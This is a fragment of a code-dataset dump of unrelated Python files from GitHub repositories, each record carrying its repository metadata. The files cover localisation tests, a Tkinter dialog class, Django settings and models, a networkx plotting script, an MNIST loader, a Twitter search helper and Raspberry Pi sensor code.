NSStringPluralRuleType\n NSStringFormatValueTypeKey\n lu\n zero\n Activate Plural\n one\n Activate Singular\n two\n Activate Plural\n few\n Activate Plural\n many\n Activate Plural\n other\n Activate Plural\n \n \n Deactivate %lu Fonts\n \n NSStringLocalizedFormatKey\n %#@variable_0@\n variable_0\n \n NSStringFormatSpecTypeKey\n NSStringPluralRuleType\n NSStringFormatValueTypeKey\n lu\n zero\n Deactivate Plural\n one\n Deactivate Singular\n two\n Deactivate Plural\n few\n Deactivate Plural\n many\n Deactivate Plural\n other\n Deactivate Plural\n \n \n \n\n\"\"\"\n\n def test_read_file(self):\n extractor = parser.StringsDict()\n dir = os.path.dirname(__file__)\n file = os.path.join(dir, \"test.stringsdict\")\n\n self.assertEquals(\n extractor._read_file(file),\n StringsDictTests.sample_strings\n )\n\n def test_extract_strings_from_filename(self):\n extractor = parser.StringsDict()\n extractor._read_file = mock.Mock(\n return_value = StringsDictTests.sample_strings\n )\n\n strings = extractor.extract_strings_from_filename(\"some_file\")\n\n self.assertEquals(\n strings,\n set([\n u\"Activate %lu Fonts\",\n u\"Activate %lu Font\",\n u\"Deactivate %lu Fonts\",\n u\"Deactivate %lu Font\",\n ])\n )\n\n def test_extract_mapping_from_filename(self):\n extractor = parser.StringsDict()\n extractor._read_file = mock.Mock(\n return_value = StringsDictTests.sample_strings\n )\n\n string_mapping = extractor.extract_mapping_from_filename(\"some_file\")\n\n self.assertEquals(\n string_mapping.string_mapping_dict,\n {\n u\"Activate %lu Fonts\" : \"Activate %lu Fonts\",\n u\"Activate %lu Font\" : \"Activate %lu Font\",\n u\"Deactivate %lu Fonts\" : \"Deactivate %lu Fonts\",\n u\"Deactivate %lu Font\" : u\"Deactivate %lu Font\",\n }\n )\n\n for key, value in string_mapping.string_mapping_dict.iteritems():\n self.assertEquals(type(key), types.UnicodeType)\n self.assertEquals(type(value), types.UnicodeType)\n\n @mock.patch.object(os, \"mkdir\")\n def test_translate(self, mkdir_func):\n file = cStringIO.StringIO()\n translator = parser.StringsDict();\n test_file = teststringio.TestStringIO()\n vcs_class = mock.Mock()\n\n translator._open_file_for_writing = mock.Mock(return_value = test_file)\n translator._read_file = mock.Mock(return_value = StringsDictTests.sample_strings)\n\n self.assertEquals(\n translator.translate(\n \"test.stringsdict\",\n \"Resources\",\n {\n u'Activate %lu Fonts' : u'Activate Plural',\n u'Activate %lu Font' : u'Activate Singular',\n u'Deactivate %lu Fonts' : u'Deactivate Plural',\n u'Deactivate %lu Font' : u'Deactivate Singular'\n },\n \"French\",\n \"fr\",\n True,\n vcs_class,\n None\n ),\n os.path.join(\"Resources\", \"test.stringsdict\")\n )\n\n self.assertEquals(\n test_file.getvalue(),\n StringsDictTests.translated_strings\n )\n\n mkdir_func.assert_called_with(\n \"Resources\"\n )\n\n translator._open_file_for_writing.assert_called_with(\n os.path.join(\"Resources\", \"test.stringsdict\")\n )\n\n vcs_class.add_file.assert_called_with(\n os.path.join(\"Resources\", \"test.stringsdict\")\n )\n\n file.close()\n","repo_name":"Extensis/Burton","sub_path":"burton/parser/test/stringsdicttests.py","file_name":"stringsdicttests.py","file_ext":"py","file_size_in_byte":7518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"30039024155","text":"# https://www.codewars.com/kata/52549d3e19453df56f0000fe\r\n\r\ndef fib(n):\r\n i = 0\r\n fib = [0,1]\r\n while i + 2 < n:\r\n fib_new = fib[i] + fib[i+1]\r\n fib.append(fib_new)\r\n i += 1\r\n return (fib[n-1])\r\n","repo_name":"jgmarquesm/Python","sub_path":"Exercícios/Codewars/6kyu - Fibonacci Reloaded.py","file_name":"6kyu - Fibonacci Reloaded.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"34212040080","text":"try:\n\tfrom Tkinter import *\nexcept ImportError:\n\tfrom tkinter import *\ntry:\n\tfrom \t\ttkColorChooser import askcolor\nexcept ImportError:\n\tfrom\t\ttkinter.colorchooser import askcolor\ntry:\n\timport \ttkFileDialog\nexcept ImportError:\n\timport\ttkinter.filedialog\ntry:\n\timport \ttkMessageBox\nexcept ImportError:\n\timport\ttkinter.messagebox\ntry:\n\timport \tttk\n\tfrom \t\tttk import *\nexcept ImportError:\n\tfrom tkinter import ttk\n\t#from \t\tttk import *\ntry:\n\timport \ttkFont\nexcept ImportError:\n\timport\ttkinter.font\n\nimport PIL\nfrom PIL import Image, ImageTk, ExifTags\n\nfrom Utils import UnderConstruction\nfrom Tooltip import *\n\n#\n# Generic Dialog CLass - All dialogs inherit from this one\n#\nclass Dialog:\n\tdef __init__ ( self, parent, modal=True, title='No title supplied',\n\t\t\t\t showtitlebar=True, centerTo='default', okonly=True,\n\t\t\t\t help=False, resizable=False, minwidth=None, minheight=None,\n\t\t\t\t camera=None, data = None ):\n\t\tself._parent = parent\n\t\tself.modal = modal\n\t\tself._window = Toplevel()\n\t\tself._window.minsize(minwidth,minheight)\n\t\tself.CancelButton = None\n\n\t\tif resizable is False:\n\t\t\tself._window.resizable(width=False,height=False)\n\n\t\tself._window.rowconfigure(0,weight=1)\n\t\tself._window.columnconfigure(0,weight=1)\n\t\tself._window.title(title)\n\t\tself._centerTo = centerTo\n\n\t\t# Should be:\t\t\tNeed to fix.....\n\t\t# self._mainFrame\n\t\t#\tself.LayoutFrame\n\t\t#\t\tSupplied to User for Layout\n\t\t#\tself._buttonFrame\n\t\t#\t\tHelp\tCancel\tOk\n\t\tself.MainFrame = ttk.Frame(self._window,padding=(5,5,5,5))\n\t\tself.MainFrame.grid(row=0,column=0,columnspan=3,sticky='NSEW')\n\n\t\tself._camera = camera\n\t\tself.data = data\n\n\t\tself.okimage = ImageTk.PhotoImage(file='Assets/ok_22x22.png')\n\t\tself.OkButton = ttk.Button(self._window,text='Close' if okonly else 'Ok',\n\t\t\tcommand=lambda:self._Ok(None),image=self.okimage,compound='left')\n\t\tself.OkButton.grid(row=1,column=2,padx=10,pady=5)\n\t\tself.OkButton.focus_set()\n\t\tToolTip(self.OkButton,50)\n\t\tself._window.bind( '', self._Ok )\n\n\t\tif okonly is False:\n\t\t\tself.cancelimage = ImageTk.PhotoImage(file='Assets/cancel_22x22.png')\n\t\t\tself.CancelButton = ttk.Button(self._window,text='Cancel',\n\t\t\t\tcommand=lambda:self._Cancel(None),image=self.cancelimage,\n\t\t\t\tcompound='left',state='disabled')\n\t\t\tself.CancelButton.grid(row=1,column=1,pady=5)\n\t\t\tToolTip(self.CancelButton,51)\n\t\t\tself._window.bind( '', self._Cancel )\n\n\t\tif help is True:\n\t\t\tb = ttk.Button(self._window,text='Help',command=lambda:self._Help(None))\n\t\t\tb.grid(row=1,column=0,sticky='W',padx=10,pady=5)\n\t\t\tToolTip(b,52)\n\t\t\tself._window.bind( '', self._Help )\n\n\t\tself.BuildDialog()\t# Overriden function\n\n\t\tself._window.after(10,self._Position)\t# better way found!\n\t\tself._window.overrideredirect(not showtitlebar)\n\t\tself._window.transient(self._parent)\t# no icon\n\n\t\tif modal is True:\t# must close this dialog to return to parent\n\t\t\tself._window.grab_set()\n\t\t\tself._parent.wait_window(self._window)\n\n\tdef BuildDialog ( self ):\t\t\t\t# Always Override\n\t\tUnderConstruction ( self.MainFrame )\n\tdef OkPressed ( self ): return True\t\t# Optional Override\n\tdef CancelPressed ( self ): return True\t# Optional Override\n\tdef HelpPressed ( self ):\t\t\t\t# Optional Override\n\t\ttkMessageBox.showwarning(\"Help\",\"No Help available!\")\n\n\t# Remap these so the dialog doesn't have to worry about the\n\t# 'event' parameter\n\tdef _Ok ( self, event ):\n\t\tif self.OkPressed(): self._window.destroy()\n\tdef _Cancel ( self, event ):\n\t\tif self.CancelPressed() : self._window.destroy()\n\tdef _Help ( self, event ):\n\t\tself.HelpPressed()\n\n\tdef _Position ( self ):\n\t\tif self._centerTo == 'default': return\n\t\t# handle center window and center screen\n\t\tif self._centerTo == 'parent':\n\t\t\tparentwidth = self._parent.winfo_width()\n\t\t\tparentheight = self._parent.winfo_height()\n\t\t\tlocX = self._parent.winfo_x()\n\t\t\tlocY = self._parent.winfo_y()\n\t\telse:\t# center to 'screen'\n\t\t\tparentwidth = self._parent.winfo_screenwidth()\n\t\t\tparentheight = self._parent.winfo_screenheight()\n\t\t\tlocX = 0\n\t\t\tlocY = 0\n\t\twidth = self._window.winfo_width()\n\t\theight = self._window.winfo_height()\n\t\tx = locX + parentwidth/2 - width / 2\n\t\ty = locY + parentheight / 2 - height / 2\n\t\tself._window.geometry('%dx%d+%d+%d' % (width,height,x,y))\n\n\n\n","repo_name":"Billwilliams1952/PiCameraApp","sub_path":"Source/Dialog.py","file_name":"Dialog.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"en","doc_type":"code","stars":266,"dataset":"github-code","pt":"52"} +{"seq_id":"40434009987","text":"\"\"\"\nDjango settings for move_out project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport dj_database_url\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ.get('SECRET_KEY', 'super_secret_key')\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = 'DJANGO_DEBUG' in os.environ\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'things',\n 'bootstrapform',\n 'storages',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'move_out.urls'\n\nWSGI_APPLICATION = 'move_out.wsgi.application'\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Europe/Warsaw'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\n\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, \"static\"),\n)\n\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.tz',\n 'django.core.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n 'django_settings_export.settings_export',\n)\n\nAWS_HEADERS = { # see http://developer.yahoo.com/performance/rules.html#expires\n 'Expires': 'Thu, 31 Dec 2099 20:00:00 GMT',\n 'Cache-Control': 'max-age=94608000',\n}\n\nAWS_STORAGE_BUCKET_NAME = os.environ.get('AWS_STORAGE_BUCKET_NAME')\nAWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')\nAWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')\n\nAWS_S3_CUSTOM_DOMAIN = '%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME\n\nSTATIC_ROOT = 'staticfiles'\nSTATIC_URL = '/static/'\n\nif AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY:\n MEDIA_URL = \"https://%s/\" % (AWS_S3_CUSTOM_DOMAIN, )\n DEFAULT_FILE_STORAGE = 'move_out.custom_storages.MediaStorage'\nelse:\n MEDIA_ROOT = os.path.join(BASE_DIR, \"media\")\n MEDIA_URL = '/media/'\n\nEMAIL_BACKEND = \"sgbackend.SendGridBackend\"\nSENDGRID_USER = os.environ.get('SENDGRID_USER')\nSENDGRID_PASSWORD = os.environ.get('SENDGRID_PASSWORD')\nSENDGRID_FROM_EMAIL = os.environ.get('SENDGRID_FROM_EMAIL')\n\nDATABASES = {\n 'default': dj_database_url.config(default='sqlite:///' + os.path.join(BASE_DIR, 'db.sqlite3'))\n}\n\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n\nALLOWED_HOSTS = ['*']\n\nSETTINGS_EXPORT = [\n 'SENDGRID_FROM_EMAIL',\n]\n","repo_name":"asendecka/move-out","sub_path":"move_out/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"19475423746","text":"from django.db import models\nfrom meajudaaajudar.models import Instituicao\n\n\nclass Donation(models.Model):\n time = models.DateTimeField(auto_created=True)\n instituicao = models.ForeignKey(Instituicao, on_delete=models.CASCADE)\n\n class Meta:\n db_table = \"donation\"\n","repo_name":"sylleryum/meajudaaajudarpython","sub_path":"meajudaaajudar/models/donation.py","file_name":"donation.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24251362644","text":"import networkx as nx\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\nimport itertools\r\n\r\n#############################\r\n###### file structure ######\r\n############################\r\n\r\n#+-- images\r\n#+-- instances\r\n#| +-- Arabidopsis.txt\r\n#| +-- smallArabidopsis.txt\r\n#| +-- Important.txt\r\n#| +-- smallImportant.txt\r\n#| +-- Down.txt\r\n#| +-- smallDown.txt\r\n#| +-- Up.txt\r\n#| +-- smallUp.txt\r\n#+-- src\r\n#| +-- MinSteinerTree.py\r\n#| +-- ReloadFigure.py\r\n#| +-- Treeify.py\r\n#| +-- _edges.txt\r\n#| +-- _noi.txt\r\n#| +-- _ndown.txt\r\n#| +-- _nup.txt\r\n#| +-- pathways.csv\r\n\r\n\r\n# The code to generate the tree using networkx was taken from: https://stackoverflow.com/questions/29586520/can-one-get-hierarchical-graphs-from-networkx-with-python-3\r\ndef hierarchy_pos(G, root, width=1., vert_gap = 0.2, vert_loc = 0, xcenter = 0.5,\r\n pos = None, parent = None):\r\n '''If there is a cycle that is reachable from root, then this will see infinite recursion.\r\n G: the graph\r\n root: the root node of current branch\r\n width: horizontal space allocated for this branch - avoids overlap with other branches\r\n vert_gap: gap between levels of hierarchy\r\n vert_loc: vertical location of root\r\n xcenter: horizontal location of root\r\n pos: a dict saying where all nodes go if they have been assigned\r\n parent: parent of this branch.'''\r\n if pos == None:\r\n pos={}\r\n pos[root] = (xcenter, vert_loc)\r\n neighbors = list(G.neighbors(root))\r\n if parent != None:\r\n neighbors.remove(parent)\r\n if len(neighbors)!=0:\r\n dx = width/len(neighbors)\r\n nextx = xcenter - width/2 - dx/2\r\n for neighbor in neighbors:\r\n nextx += dx\r\n pos = hierarchy_pos(G, neighbor, width = dx, vert_gap = vert_gap,\r\n vert_loc = vert_loc-vert_gap, xcenter=nextx, pos=pos,\r\n parent = root)\r\n return pos\r\n\r\n# The code can be run as: python Treeify.py testing AT1G62360.1 -all\r\n# where testing will be the name of the image files produced (in the images folder)\r\n# AT1G62360.1 is the node we are looking for\r\n# and -all signals that all nodes will be labeled\r\n\r\nedgeName=\"_edges.txt\"\r\nnoiName=\"_noi.txt\"\r\nndownName=\"_ndown.txt\"\r\nnupName=\"_nup.txt\"\r\nH=nx.read_edgelist(edgeName)\r\n\r\npaths=dict(nx.all_pairs_shortest_path(H))\r\ndeg=nx.degree_centrality(H)\r\n\r\nmyPathways=open(\"pathways.csv\", 'w')\r\n\r\nleafs=[i for i in H.nodes() if deg[i]*(H.number_of_nodes()-1)==1]\r\n#print(len(leafs))\r\n\r\ngene=\"3702.\"+sys.argv[2]\r\n\r\noptions=[]\r\nfor i in range(3,(len(sys.argv))):\r\n options.append(sys.argv[i])\r\n\r\n\r\nfor (i,j) in itertools.combinations(leafs, 2):\r\n for l in paths[i][j]:\r\n myPathways.write(str(l)+\",\")\r\n myPathways.write(\"\\n\")\r\n myPathways.flush()\r\n\r\nnoi=[]\r\nwith open(noiName, 'r') as f:\r\n for line in f:\r\n line = line.rstrip()\r\n noi.append(line)\r\nnblue=[]\r\nfor i in H.nodes():\r\n if str(i) in noi:\r\n nblue.append(i)\r\n#print(nblue)\r\nndown=[]\r\nwith open(ndownName, 'r') as f:\r\n for line in f:\r\n line = line.rstrip()\r\n ndown.append(line)\r\nnred=[]\r\nfor i in H.nodes():\r\n if str(i) in ndown:\r\n nred.append(i)\r\n#print(nred)\r\nnup=[]\r\nwith open(nupName, 'r') as f:\r\n for line in f:\r\n line = line.rstrip()\r\n nup.append(line)\r\nngreen=[]\r\nfor i in H.nodes():\r\n if str(i) in nup:\r\n ngreen.append(i)\r\n#print(ngreen)\r\n\r\nmyLabels={}\r\nif \"-all\" in options:\r\n for i in H.nodes():\r\n myLabels[i]=str(i)\r\n myLabels[i]=myLabels[i].replace(\"3702.\",\"\")\r\nelse:\r\n if \"-imp\" in options:\r\n for i in nblue:\r\n myLabels[i]=str(i)\r\n myLabels[i]=myLabels[i].replace(\"3702.\",\"\")\r\n if \"-down\" in options:\r\n for i in nred:\r\n myLabels[i]=str(i)\r\n myLabels[i]=myLabels[i].replace(\"3702.\",\"\")\r\n if \"-up\" in options:\r\n for i in ngreen:\r\n myLabels[i]=str(i)\r\n myLabels[i]=myLabels[i].replace(\"3702.\",\"\")\r\n if \"-not\" in options:\r\n for i in H.nodes():\r\n if i not in nblue and i not in ngreen and i not in nred:\r\n myLabels[i]=str(i)\r\n myLabels[i]=myLabels[i].replace(\"3702.\",\"\")\r\n\r\n\r\nnList=[]\r\nfound=False\r\nfor i in H.nodes():\r\n nList.append(i)\r\n if str(i)==gene:\r\n found=True\r\n geneNode=i\r\n\r\n\r\n\r\n\r\nif found:\r\n pos = hierarchy_pos(H,geneNode)\r\n plt.figure(1,figsize=(12,12))\r\n nx.draw(H, pos=pos, with_labels=False)\r\n nx.draw_networkx_nodes(H,pos,nodelist=nList,node_color='b')\r\n nx.draw_networkx_nodes(H,pos,nodelist=nred,node_color='r')\r\n nx.draw_networkx_nodes(H,pos,nodelist=ngreen,node_color='g')\r\n nx.draw_networkx_nodes(H,pos,nodelist=nblue,node_color='y')\r\n nx.draw_networkx_labels(H, pos, myLabels, font_size=12, font_family='sans-serif')\r\n outName=\"../images/\"+sys.argv[1]+\"_Tree_\"+gene+\".pdf\"\r\n plt.savefig(outName, bbox_inches='tight', dpi=300)\r\n #\r\n plt.show()\r\n \r\n newH=nx.Graph(H)\r\n newH.remove_node(geneNode)\r\n allComponents=sorted(nx.connected_component_subgraphs(newH), key = len, reverse=True)\r\n cnt=1\r\n for C in allComponents:\r\n Cnred=[]\r\n Cngreen=[]\r\n Cnblue=[]\r\n for i in C.nodes():\r\n if str(i) in ndown:\r\n Cnred.append(i)\r\n if str(i) in nup:\r\n Cngreen.append(i)\r\n if str(i) in noi:\r\n Cnblue.append(i)\r\n CmyLabels={}\r\n for i in C.nodes():\r\n CmyLabels[i]=str(i)\r\n CmyLabels[i]=CmyLabels[i].replace(\"3702.\",\"\")\r\n\r\n #print(nred)\r\n pos=nx.spectral_layout(C, scale=1.0)\r\n plt.figure(1,figsize=(12,12))\r\n nx.draw(C,pos)\r\n nx.draw_networkx_labels(C, pos, CmyLabels, font_size=12, font_family='sans-serif')\r\n #nx.draw_networkx_edges(H, pos, edgelist=H.edges())\r\n nx.draw_networkx_nodes(C,pos,nodelist=C.nodes(),node_color='b')\r\n nx.draw_networkx_nodes(C,pos,nodelist=Cnred,node_color='r')\r\n nx.draw_networkx_nodes(C,pos,nodelist=Cngreen,node_color='g')\r\n nx.draw_networkx_nodes(C,pos,nodelist=Cnblue,node_color='y')\r\n #nx.draw_networkx_labels(C,pos, myLabels, font_size=12, font_family='sans-serif')\r\n outName=\"../images/\"+sys.argv[1]+\"_Subtrees\"+str(cnt)+\".pdf\"\r\n plt.savefig(outName, bbox_inches='tight', dpi=300)\r\n #\r\n #plt.show()\r\n cnt=cnt+1\r\n\r\nelse:\r\n print(sys.argv[2]+\" not Found\")\r\n\r\n\r\n","repo_name":"Gazala-Ameen/PPIN","sub_path":"Treeify.py","file_name":"Treeify.py","file_ext":"py","file_size_in_byte":6530,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"42203655990","text":"def I(): return(list(map(int,input().split())))\r\nn=int(input())\r\nx=I()\r\nm=int(input())\r\nq=I()\r\narr=[0]*(n+1)\r\narr[0]=x[0]\r\nfor i in range(n-1):\r\n\tarr[i+1]=arr[i]+x[i+1]\r\n\r\nfor i in range(m):\r\n\r\n\tl=0\r\n\tr=n-1\r\n\r\n\twhile(l<=r):\r\n\t\tmid=(r-l)//2+l\r\n\t\tif arr[mid]x{}'.format(color, text)\n return text\n\n\ndef _orange(text):\n return _colorize(\"#999922\", text)\n\n\ndef _blue(text):\n return _colorize(\"#2222ee\", text)\n","repo_name":"realtimeprojects/acre-lib","sub_path":"src/acre/steps/videorecorder.py","file_name":"videorecorder.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42784903300","text":"def spy_game(nums):\r\n spyno=[0,0,7,'x']\r\n for i in nums:\r\n if i == spyno[0]:\r\n spyno.pop(0)\r\n return len(spyno) == 1\r\n\r\ndef lst():\r\n\r\n lst =[]\r\n n= int(input(\"Enter no. of values to be inserted in the list:\"))\r\n print(\"Ënter elements:\")\r\n for i in range(0,n):\r\n ele = int(input())\r\n lst.append(ele)\r\n return (lst)\r\n\r\nnums = lst()\r\nspy_game(nums)\r\n","repo_name":"somnov18/Python-programs","sub_path":"spy_game.py","file_name":"spy_game.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73877935204","text":"\"\"\"\nCopied from https://github.com/yoonholee/pytorch-vae/blob/master/data_loader/fixed_mnist.py\n\"\"\"\n\nimport h5py\nimport torch\nimport torch.utils.data as data\nfrom torchvision import transforms\nimport os\nimport numpy as np\nfrom PIL import Image\nimport urllib.request\n\n\nclass fixedMNIST(data.Dataset):\n \"\"\" Binarized MNIST dataset, proposed in\n http://proceedings.mlr.press/v15/larochelle11a/larochelle11a.pdf \"\"\"\n\n train_file = \"binarized_mnist_train.amat\"\n val_file = \"binarized_mnist_valid.amat\"\n test_file = \"binarized_mnist_test.amat\"\n\n def __init__(self, root, train=True, transform=None, download=False):\n # we ignore transform.\n self.root = os.path.expanduser(root)\n self.train = train # training set or test set\n\n if download:\n self.download()\n if not self._check_exists():\n raise RuntimeError(\n \"Dataset not found.\" + \" You can use download=True to download it\"\n )\n\n self.data = self._get_data(train=train)\n\n def __getitem__(self, index):\n img = self.data[index]\n img = Image.fromarray(img)\n img = transforms.ToTensor()(img).type(torch.FloatTensor)\n return img, torch.tensor(-1) # Meaningless tensor instead of target\n\n def __len__(self):\n return len(self.data)\n\n def _get_data(self, train=True):\n with h5py.File(os.path.join(self.root, \"data.h5\"), \"r\") as hf:\n data = hf.get(\"train\" if train else \"test\")\n data = np.array(data)\n return data\n\n def get_mean_img(self):\n return self.data.mean(0).flatten()\n\n def download(self):\n if self._check_exists():\n return\n if not os.path.exists(self.root):\n os.makedirs(self.root)\n\n print(\"Downloading MNIST with fixed binarization...\")\n for dataset in [\"train\", \"valid\", \"test\"]:\n filename = \"binarized_mnist_{}.amat\".format(dataset)\n url = \"http://www.cs.toronto.edu/~larocheh/public/datasets/binarized_mnist/binarized_mnist_{}.amat\".format(\n dataset\n )\n print(\"Downloading from {}...\".format(url))\n local_filename = os.path.join(self.root, filename)\n urllib.request.urlretrieve(url, local_filename)\n print(\"Saved to {}\".format(local_filename))\n\n def filename_to_np(filename):\n with open(filename) as f:\n lines = f.readlines()\n return np.array([[int(i) for i in line.split()] for line in lines]).astype(\n \"int8\"\n )\n\n train_data = np.concatenate(\n [\n filename_to_np(os.path.join(self.root, self.train_file)),\n filename_to_np(os.path.join(self.root, self.val_file)),\n ]\n )\n test_data = filename_to_np(os.path.join(self.root, self.val_file))\n with h5py.File(os.path.join(self.root, \"data.h5\"), \"w\") as hf:\n hf.create_dataset(\"train\", data=train_data.reshape(-1, 28, 28))\n hf.create_dataset(\"test\", data=test_data.reshape(-1, 28, 28))\n print(\"Done!\")\n\n def _check_exists(self):\n return os.path.exists(os.path.join(self.root, \"data.h5\"))\n","repo_name":"HEmile/storchastic","sub_path":"examples/dataloader/fixed_mnist.py","file_name":"fixed_mnist.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"52"} +{"seq_id":"25923926805","text":"from django import template\nfrom typing import re\n# 유효한 tag library 만들기 위한 모듈 레벨의 인스턴스 객체\nregister = template.Library()\n\n# template에서 사용할 사용자 정의 필터\n@register.filter\ndef add_link(value):\n # 전달된 value 객체의 content 멤버 변수 가져옴.\n content = value.content\n # 전달된 value 객체의 tag_set 전체를 가져오는 query set을 리턴\n tags = value.tag_set.all()\n\n # tags를 순회하며 content 내에서 해당 문자열을 링크를 포함한 문자열로 replace\n for tag in tags:\n # re.sub(정규표현식, 대상문자열, 치환문자)\n\n content = re.sub(r'\\#'+tag.name+ r'\\b', '#'+tag.name+'', content)\n return content\n\n","repo_name":"JoungMinJu/kakaoWeb","sub_path":"kakaoWeb/community/templatetags/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10073265717","text":"from searchtweets import load_credentials\r\nfrom searchtweets import gen_rule_payload\r\nfrom searchtweets import ResultStream\r\nimport yaml\r\nimport json\r\n\r\ndef get_file(aname, cak, cask, etype, hashtag, keywords, fdate = '00-00-0000', tdate = '00-00-0000', ftime = '00:00', ttime = '00:00'):\r\n \r\n if etype == 'efa': # Full archive scraping (refer to limits on README)\r\n endp = 'https://api.twitter.com/1.1/tweets/search/fullarchive/' + aname + '.json'\r\n elif etype == 'tdays': # 30 days scraping (refer to limits on README)\r\n endp = 'https://api.twitter.com/1.1/tweets/search/30day/' + aname + '.json'\r\n else:\r\n endp = 'ERROR'\r\n \r\n # Creating a yaml credentials file\r\n config = dict(\r\n search_tweets_api = dict(\r\n account_type = 'premium',\r\n endpoint = endp,\r\n consumer_key = cak,\r\n consumer_secret = cask\r\n )\r\n )\r\n\r\n with open('C:\\\\Users\\\\Samuktha\\\\Documents\\\\USC\\\\twitter\\\\proj\\\\cred.yaml', 'w') as config_file:\r\n yaml.dump(config, config_file, default_flow_style=False)\r\n \r\n # loading credentials\r\n premium_search_args = load_credentials('C:\\\\Users\\\\Samuktha\\\\Documents\\\\USC\\\\twitter\\\\proj\\\\cred.yaml',\r\n yaml_key = 'search_tweets_api',\r\n env_overwrite = True)\r\n print(premium_search_args)\r\n \r\n if etype == 'efa':\r\n rule = gen_rule_payload(results_per_call = 100,\r\n from_date = fdate + ' '+ ftime, #\"2019-07-06 01:00\",\r\n to_date = tdate + ' ' + ttime, #\"2019-07-06 02:15\",\r\n pt_rule = keywords,\r\n )\r\n else:\r\n rule = gen_rule_payload(results_per_call = 100,\r\n pt_rule = keywords)\r\n \r\n \r\n # result stream\r\n\r\n rs = ResultStream(rule_payload = rule,\r\n max_results = 50,\r\n **premium_search_args)\r\n \r\n\r\n \r\n \r\n return rs\r\n","repo_name":"samyuktha17/GetTweetsNow","sub_path":"source_tweets.py","file_name":"source_tweets.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4816817600","text":"import RPi.GPIO as GPIO \nGPIO.setmode(GPIO.BCM) \nimport time\n \nGPIO.setup(9, GPIO.IN, pull_up_down=GPIO.PUD_UP) \nGPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\nTRIG = 23\nECHO = 24\nTRIG1=14\nECHO1=15\nTRIG2=2\nECHO2=3\nTRIG3=27\nECHO3=22\nwater_trig=5\nwater_echo=6\n\n\ndef distance(GPIO_TRIGGER,GPIO_ECHO):\n GPIO.setup(GPIO_TRIGGER, GPIO.OUT)\n GPIO.setup(GPIO_ECHO, GPIO.IN)\n\n\n # set Trigger to HIGH\n GPIO.output(GPIO_TRIGGER, True)\n \n # set Trigger after 0.01ms to LOW\n time.sleep(0.00001)\n GPIO.output(GPIO_TRIGGER, False)\n \n StartTime = time.time()\n StopTime = time.time()\n \n # save StartTime\n while GPIO.input(GPIO_ECHO) == 0:\n StartTime = time.time()\n \n # save time of arrival\n while GPIO.input(GPIO_ECHO) == 1:\n StopTime = time.time()\n \n # time difference between start and arrival\n TimeElapsed = StopTime - StartTime\n # multiply with the sonic speed (34300 cm/s)\n # and divide by 2, because there and back\n distance = (TimeElapsed * 34300) / 2\n \n return distance\n\ndef my_callback(channel):\n while True:\n dist1 = distance(TRIG,ECHO)\n print (\"Measured Distance from the first 90 degree= %.1f cm\" % dist1)\n 